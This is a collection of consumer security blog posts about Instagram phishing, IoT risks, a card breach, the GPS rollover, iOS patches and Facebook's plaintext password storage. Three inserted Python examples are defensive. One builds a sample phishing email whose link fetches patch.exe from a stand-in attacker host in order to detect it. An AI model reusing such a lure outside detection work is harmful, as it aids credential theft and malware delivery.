
Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

While many of us were focused on the European Union’s GDPR and California’s Consumer Privacy Act (CCPA), the giant on the other side of the world implemented China’s Cybersecurity Law (CSL) in June 2017. While CSL laid out broad data protection principles, there were noticeable gaps related to implementation and overall scope. To operationalize and further clarify CSL scope, the Chinese government instituted six systems: the Internet Information Content Management System; the Cybersecurity Multi-Level Protection System (MLPS); the Critical Information Infrastructure Security Protection System; the Network Products and Services Management System; the Cybersecurity Incident Management System; and the Personal Information … Continue reading The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

The post The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations appeared first on TrustArc Blog.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in a [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s –– Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were less than one billion IoT devices in use around the world. In the year 2019, that number has been projected to skyrocket to over eight billion throughout the course of this year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. With these devices creating more access points throughout our smart homes, it is comparable to leaving a backdoor unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, that will continue to grow to not only fit evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints come more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs that appeared secure but under the surface had security flaws that could facilitate home network exposures by bad actors in the future. Some IoT devices, such as an IoT thermometer and home Wi-Fi routers, were actually used to conduct botnet attacks.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in an advanced internet router with built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, we are extremely reliant on our GPS devices. In fact, we’re so reliant on them that map features are programmed into almost every IoT device we use, as well as into our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering what causes this rollover issue. GPS satellites broadcast the week number as a ten-bit value, meaning that receivers start counting at week zero and then wrap back to zero when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into roughly a foot of location error.
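
The arithmetic behind the rollover, as an added example that is not part of the original post and not code from any GPS vendor: it encodes a UTC instant the way the legacy ten-bit week field would carry it, shows how a receiver that hard-codes its 1024-week era jumps back in time once the field wraps, and shows the usual firmware fix, which picks the era relative to the firmware build date (that "pivot" approach is the reason an up-to-date receiver is unaffected). The GPS epoch (6 January 1980) and the speed of light are standard constants; the 2015 build date and the sample instants are assumptions for the demonstration.

```python
from datetime import datetime, timedelta, timezone

# GPS time starts at the "GPS epoch": 00:00:00 UTC on Sunday, 6 January 1980.
GPS_EPOCH = datetime(1980, 1, 6, tzinfo=timezone.utc)
WEEK = timedelta(weeks=1)
WEEK_BITS = 10                  # the legacy navigation message carries a 10-bit week number
WEEK_MODULUS = 1 << WEEK_BITS   # 1024: the field wraps back to 0 after week 1023


def full_gps_week(t):
    """Whole weeks elapsed since the GPS epoch, with no wraparound."""
    return (t - GPS_EPOCH) // WEEK


def encode(t):
    """What a satellite broadcasts for instant t: (10-bit week field, seconds into that week)."""
    week = full_gps_week(t)
    time_of_week = (t - GPS_EPOCH - week * WEEK).total_seconds()
    return week % WEEK_MODULUS, time_of_week


def rollover_instants(count):
    """UTC instants at which the 10-bit field wraps (end of 21 Aug 1999, end of 6 Apr 2019, ...)."""
    return [GPS_EPOCH + WEEK_MODULUS * n * WEEK for n in range(1, count + 1)]


def naive_decode(week_field, time_of_week, assumed_era):
    """Firmware that hard-codes which 1024-week era it lives in.
    Era 1 began in August 1999; once the field wraps in April 2019 such a
    receiver silently jumps back 1024 weeks."""
    week = assumed_era * WEEK_MODULUS + week_field
    return GPS_EPOCH + week * WEEK + timedelta(seconds=time_of_week)


def pivot_decode(week_field, time_of_week, firmware_build):
    """Wrap-aware decode: choose the era so the result is never earlier than the
    firmware build date. This stays correct for 1024 weeks after the build,
    which is why vendors ship updates before a rollover."""
    build_week = full_gps_week(firmware_build)
    week = (build_week // WEEK_MODULUS) * WEEK_MODULUS + week_field
    if week < build_week:          # the field already wrapped since the build: next era
        week += WEEK_MODULUS
    return GPS_EPOCH + week * WEEK + timedelta(seconds=time_of_week)


def range_error_feet(clock_error_ns):
    """Position error implied by a timing error: light covers about 0.98 ft per nanosecond."""
    feet_per_metre = 3.280839895
    feet_per_ns = 299_792_458 * feet_per_metre / 1e9
    return clock_error_ns * feet_per_ns


if __name__ == "__main__":
    # Assumed sample instant: the day after the 2019 rollover.
    now = datetime(2019, 4, 8, 12, 0, tzinfo=timezone.utc)
    build = datetime(2015, 1, 1, tzinfo=timezone.utc)   # assumed firmware build date
    field, tow = encode(now)
    print("broadcast week field:", field, "time of week (s):", tow)
    print("era-1 receiver thinks it is:", naive_decode(field, tow, 1))
    print("pivot-aware receiver says   :", pivot_decode(field, tow, build))
    print("rollovers:", [r.date().isoformat() for r in rollover_instants(2)])
    print("100 ns clock error ~", round(range_error_feet(100)), "ft")
```

Running it prints a week field of 0 for April 2019, which the era-1 receiver turns into August 1999 while the pivot-aware receiver decodes correctly; the last line shows why even a small timing slip matters for position.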

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.
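
The first two tips above (check who the sender really is, and hover to see where a link really goes) can be automated for an inbox or a mail gateway. The following is an added example, not code from the original post or from McAfee: it parses a constructed sample message, compares the sender's domain against a list of domains the reader knows, and flags any anchor whose visible text is a URL on one host while its href points at another. The sample message, the domain names and the trusted-domain list are all constructed for the demonstration.

```python
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not a real lure): a fake "rollover patch" notice.
SAMPLE_EMAIL = """\
From: "GPS Vendor Support" <alerts@gps-vendor-support.example>
To: driver@example.org
Subject: Urgent: install the week-rollover patch before April 6
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your receiver needs an update. Click the link below to install it.</p>
<p><a href="http://downloads.example-attacker.test/patch.exe">https://www.gps-vendor.example/support/update</a></p>
<p><a href="https://www.gps-vendor.example/support">Support home</a></p>
</body></html>
"""

# Domains the reader actually does business with (assumed for the example).
TRUSTED_SENDER_DOMAINS = {"gps-vendor.example"}


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from every anchor in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased host of a URL, or None if the text is not a URL at all."""
    parsed = urlparse(url.strip())
    return parsed.hostname if parsed.scheme and parsed.hostname else None


def sender_domain(from_header):
    """Domain of the real address in a From: header, ignoring the display name."""
    _, address = parseaddr(str(from_header))
    return address.rsplit("@", 1)[-1].lower() if "@" in address else None


def find_phishing_indicators(raw_message):
    """Returns a list of human-readable findings; an empty list means nothing stood out."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    domain = sender_domain(msg["From"])
    if domain not in TRUSTED_SENDER_DOMAINS:
        findings.append(f"sender domain not recognised: {domain}")
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        collector = LinkCollector()
        collector.feed(body.get_content())
        for href, text in collector.links:
            shown, actual = host_of(text), host_of(href)
            # The "hover" check: visible URL text and real destination disagree.
            if shown and actual and shown != actual:
                findings.append(f"link text shows {shown} but points to {actual}")
    return findings


if __name__ == "__main__":
    for finding in find_phishing_indicators(SAMPLE_EMAIL):
        print("-", finding)
```

A lookalike sender domain and a link whose text advertises the vendor's site while pointing at a download host are exactly the two signals the tips ask readers to look for; a link whose visible text is plain words ("Support home") is not flagged by the mismatch rule, so the sender check still matters.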


iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at their keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and covers devices ranging from the iPhone 5s and later to the iPad Air, and even products running tvOS. These software patches cover a variety of bugs that cybercriminals could exploit to cause denial of service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in WebKit, the browser engine Apple uses in many of its products including Safari, Mail, and the App Store. Among these vulnerabilities were memory corruption bugs, which could lead to arbitrary code execution. This type of attack allows malicious actors to run any command on the target system, potentially giving them access to the victim’s files or letting them take over the victim’s system remotely. To prevent arbitrary code execution attacks, Apple improved memory handling and state management, the processes that control and coordinate device memory in order to optimize overall system performance. Another issue patched by this update is the ability for a cybercriminal to bypass sandbox restrictions, which protect a device’s critical infrastructure from suspicious code. To combat this, Apple improved its validation checks.

While it can be easy to click the “Remind Me Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.


Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone, outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), or access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace the default password with a bulletproof one, putting a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you’ve done a lot of things to protect your phone — a lock screen, secure passwords on accounts, and system updates — there are hacking tactics you likely know nothing about. According to McAfee’s recent Mobile Threat Report, that is because the scope and complexity of mobile hacks are increasing at alarming rates.

Hidden Apps

The latest statistics report that the average person has between 60 and 90 apps installed on their phone. Multiply that across all the users in your home, and you are looking at anywhere from 200 to 500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that’s where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are one way that crooks trick users into letting them inside their phones. Typically, hidden apps (such as TimpDoor) get to users via Google Play when they download games or customized tools. TimpDoor then contacts users directly via a text with a link to a voice message that gives detailed instructions to enable apps from unknown sources. That link downloads malware that keeps running in the background after the app closes. Users often forget they’ve downloaded it and go on with life while the malware runs in the background and can reach other internal networks through the smartphone.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year that is the 60 million+ downloaded game Fortnite. The Fortnite craze has led hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate: they offer enticing downloads and promise users a ton of free perks and add-ons. Once users download the fake app, crooks can collect money through ads, send text messages with more bad app links, cryptojack users, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspiciously acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.


Facebook Users: Here are Proactive Tips to Keep Your Data Safe

Social media has become extremely popular over the years, providing users with an easy way to communicate with their friends and family. As social media users, we put a lot of faith and trust in these platforms to maintain the security of our private information. But what happens when our private information is mishandled? The reality is that these incidents happen and users need to be prepared. Yesterday, Facebook announced that it did not properly mask the passwords of hundreds of millions of its users, primarily those associated with Facebook Lite.

You might be wondering how exactly this happened. It appears that many user passwords for Facebook, Facebook Lite, and Instagram were stored in plaintext in an internal company database. This means that thousands of Facebook employees had access to the database and could have potentially searched through these user passwords. Thankfully, no cases of data misuse were reported in the investigation, and these passwords were never visible to anyone outside of the company. According to Facebook software engineer Scott Renfro, Facebook is in the process of investigating long-term infrastructure changes to prevent these security issues going forward.
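
To make concrete what "stored in plaintext" means and what the correct handling looks like, here is an added example; it is not Facebook's code and not from the original post. The first two functions store and check a password as a salted, slow hash (PBKDF2-HMAC-SHA256 from Python's standard library), so the stored value cannot be turned back into the password; the logging filter shows the other half of the problem, a diagnostic message that interpolates the submitted password and would otherwise land, in plaintext, in a log that many employees can search. The iteration count, the message wording and the sample credentials are assumptions for the demonstration.

```python
import hashlib
import hmac
import io
import logging
import os
import re

PBKDF2_ITERATIONS = 600_000   # assumed work factor; raise it as hardware gets faster
SALT_BYTES = 16


def hash_password(password, salt=None):
    """Stores only a salted, slow hash; nothing recoverable about the password is kept."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "$".join(["pbkdf2_sha256", str(PBKDF2_ITERATIONS), salt.hex(), digest.hex()])


def verify_password(password, stored):
    """Recomputes the hash with the stored salt and compares in constant time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


class RedactSecrets(logging.Filter):
    """Scrubs password-like fields out of every record before any handler writes it."""
    PATTERN = re.compile(r"(password|passwd|pwd)(\s*[=:]\s*)([^\s,;&]+)", re.IGNORECASE)

    def filter(self, record):
        # Render the message first so interpolated values are visible to the pattern.
        record.msg = self.PATTERN.sub(r"\1\2[REDACTED]", record.getMessage())
        record.args = ()
        return True


def capture_login_log(username, password, redact=True):
    """Reproduces the defect (a failed-login message that interpolates the submitted
    password) and returns the line that would reach the log file, with or without
    the redaction filter installed."""
    buffer = io.StringIO()
    logger = logging.getLogger(f"auth-demo-{id(buffer)}")
    logger.setLevel(logging.INFO)
    logger.propagate = False
    handler = logging.StreamHandler(buffer)
    handler.setFormatter(logging.Formatter("%(message)s"))
    logger.addHandler(handler)
    if redact:
        logger.addFilter(RedactSecrets())
    logger.info("login failed for %s: password=%s", username, password)   # the bug
    logger.removeHandler(handler)
    return buffer.getvalue().strip()


if __name__ == "__main__":
    record = hash_password("correct horse battery")
    print("stored:", record)
    print("right password accepted:", verify_password("correct horse battery", record))
    print("wrong password accepted:", verify_password("correct horse batter", record))
    print("unfiltered log line:", capture_login_log("alice", "hunter2", redact=False))
    print("filtered log line  :", capture_login_log("alice", "hunter2"))
```

The point of the filter is that it sits on the logger, so every handler (file, syslog, a central log platform) sees the scrubbed record; the better fix is still never to put the credential into a log call in the first place, and the filter is the safety net for the call someone forgot.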

According to Facebook’s vice president of engineering, security, and privacy, the company has corrected the password logging bug and plans to notify the users whose passwords may have been exposed. But what can users do to better protect their data when an incident like this occurs? Check out the following tips:

  • Change your password. As a precautionary step, update your Facebook and Instagram passwords by going into the platforms’ security and privacy settings. Make sure your passwords are unique and complex.
  • Use multi-factor authentication. While this shouldn’t be your be-all and end-all security solution, it can help protect your credentials in the case of data exposure.
  • Set up a password manager. Using a password manager is one of the easiest ways to keep track of and manage your passwords so you can easily change them after these types of incidents occur.


How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

